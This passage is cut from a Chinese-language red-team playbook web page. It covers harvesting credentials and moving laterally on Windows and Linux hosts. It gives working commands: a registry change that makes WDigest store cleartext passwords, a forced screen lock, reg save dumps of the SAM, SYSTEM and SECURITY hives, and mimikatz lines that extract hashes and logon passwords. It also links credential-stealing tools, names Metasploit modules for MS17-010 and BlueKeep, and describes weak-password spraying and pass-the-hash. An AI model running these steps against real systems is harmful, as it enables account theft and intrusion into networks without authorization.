</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>Server 2012 抓取明文密码：</strong></p> <blockquote><p>手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录+导出Hash+本地mimikatz抓明文</p></blockquote> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#修改注册表来让Wdigest Auth保存明文口令</span>
reg <span class="token function">add</span> HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d <span class="token number">1</span> /f

<span class="token comment">#恢复</span>
reg <span class="token function">add</span> HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d <span class="token number">0</span> /f
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>强制锁屏</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>rundll32.exe user32.dll,LockWorkStation
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="导出ntml-hash">导出NTML Hash <a href="#导出ntml-hash" class="header-anchor">#</a></h2> <h3 id="sharpdump-mimikatz本地读取">Sharpdump+ mimikatz本地读取 <a href="#sharpdump-mimikatz本地读取" class="header-anchor">#</a></h3> <p>需要.NET 3.5版本框架，需要系统管理员权限</p> <p>下载地址：https://github.com/GhostPack/SharpDump</p> <p>Dump 的文件默认是 bin 后缀，拖到本地机器把 bin 重命名为 zip，然后解压出来再丢给 mimikatz</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>mimikatz.exe “sekurlsa::minidump debug45” “sekurlsa::logonPasswords full” “exit”
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="注册表-mimikatz本地读取">注册表 + mimikatz本地读取 <a href="#注册表-mimikatz本地读取" class="header-anchor">#</a></h3> <p><strong>（1）导出SAM和System文件</strong></p> <p>Win2000和XP需要先提到<code>SYSTEM</code>，Server 03开始直接可以reg save 也需要<code>系统管理员权限</code></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>reg save hklm<span class="token punctuation">\</span>sam sam.hive
reg save hklm<span class="token punctuation">\</span>system system.hive
reg save hklm<span class="token punctuation">\</span>security security.hive
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><strong>（2）mimikatz本地读取 NTML Hash</strong></p> <blockquote><p>mimikatz可以从内存中提取明文编码、散列值、PIN和Kerberos票据；</p> <p>还可以用来执行哈希传递、票据传递和构建黄金票据（Golden Ticket）。</p></blockquote> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#将导出的文件和mimikatz放到同一目录</span>
mimikatz.exe <span class="token string">&quot;lsadump::sam /sam:sam.hive /system:system.hive /security:security.hive&quot;</span> <span class="token builtin class-name">exit</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h1 id="横向获取主机权限">横向获取主机权限 <a href="#横向获取主机权限" class="header-anchor">#</a></h1> <h2 id="获取历史连接凭证">获取历史连接凭证 <a href="#获取历史连接凭证" class="header-anchor">#</a></h2> <p><strong>获取RDP连接凭证（保存过的）</strong></p> <p>https://github.com/AlessandroZ/LaZagne</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>lazagne.exe windows
<span class="token comment">#git密码也能获取到</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>获取历史连接<code>wifi</code>密码</strong></p> <p>https://github.com/wangle201210/wifiPass</p> <p><strong>获取XShell连接凭证</strong></p> <p>https://github.com/dzxs/Xdecrypt</p> <p><strong>浏览器历史记录和凭据</strong></p> <p>https://github.com/moonD4rk/HackBrowserData</p> <h2 id="翻阅配置文件">翻阅配置文件 <a href="#翻阅配置文件" class="header-anchor">#</a></h2> <p><strong>数据库配置文件</strong></p> <p>JSP站</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>网站目录/WEB-INF/classes/database.properties
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>MySQL数据库找密码</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">find</span> / -name user.MYD
/var/lib/mysql/mysql/user.MYD
<span class="token comment">#下载下来解密MD5得到root密码</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><strong>常见应用配置文件位置</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>Tomcat:	$CATALINA_HOME/conf/server.xml
Apache:	/etc/httpd/conf/httpd.conf
Nginx:	/etc/nginx/nginx.conf
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><h2 id="弱口令">弱口令 <a href="#弱口令" class="header-anchor">#</a></h2> <p>1、用已知口令和常见弱口令构造字典，把<code>SNETCracker</code>代理进去扫SSH、RDP、MySQL等服务</p> <p>2、Web后台弱口令和网络设备默认口令</p> <p>3、技巧：如果能进到邮箱或wiki系统翻找到初始口令的话可以批量获取主机权限</p> <h2 id="系统漏洞">系统漏洞 <a href="#系统漏洞" class="header-anchor">#</a></h2> <p><strong>MS17-010（CVE-2017-0143）</strong></p> <p>MSF有两种方式：</p> <ul><li>反弹shell：<code>exploit/windows/smb/ms17_010_psexec</code>，需要在主机上进行端口转发</li> <li>直接执行命令：<code>auxiliary/admin/smb/ms17_010_command</code>，直接在主机上执行命令</li></ul> <p><strong>Win7_RDP_RCE（CVE-2019-0708）</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>auxiliary/scanner/rdp/cve_2019_0708_bluekeep

exploit/windows/rdp/cve_2019_0708_bluekeep_rce
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><h2 id="未授权访问漏洞">未授权访问漏洞 <a href="#未授权访问漏洞" class="header-anchor">#</a></h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>Redis未授权访问
MongoDB未授权访问
Hadoop未授权访问漏洞
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><h2 id="web应用漏洞">Web应用漏洞 <a href="#web应用漏洞" class="header-anchor">#</a></h2> <p>重点关注<code>Shiro反序列化</code>、<code>Weblogic</code>、<code>Struts2</code>等可直接利用的组件漏洞</p> <p>还有SQL注入、文件上传等能Getshell的Web安全漏洞</p> <h2 id="重点目标系统">重点目标系统 <a href="#重点目标系统" class="header-anchor">#</a></h2> <p><code>Zabbix</code>等监控系统，默认口令（Admin/zabbix）</p> <p>通过<code>堡垒机</code>默认口令进入堡垒机，直接主机权限路径分刷满</p> <p>查看<code>wiki系统</code>很多组织会在其中公示一些初始密码，拿来去做弱口令扫描</p> <h2 id="凭证传递攻击">凭证传递攻击 <a href="#凭证传递攻击" class="header-anchor">#</a></h2> <p>Hash传递攻击和票据传递攻击，是域渗透中的攻击方法</p> <p>Hash传递攻击本地用户的话需要密码相同才能成功（域管理账户的话可以随意登录）</p> <p>可以用CS直接去扫445然后抓了hash去传递</p> <blockquote><p>hash注入的原理是，将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程<code>lsass.exe</code>中去</p> <p>使得本地在使用<code>ipc</code>登录目标机器的时候就如同自己登录自己的机器一样获得权限</p> <p>需要支持受限管理员模式，Server 2012-r2后默认支持受限管理员模式</p></blockquote></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/hw/hold-root.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        权限维持
      </a></span> <span class="next"><a href="/knowledge/hw/log-action.html">
        日志处理
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/62.9c0ad8c5.js" defer></script>
  </body>
</html>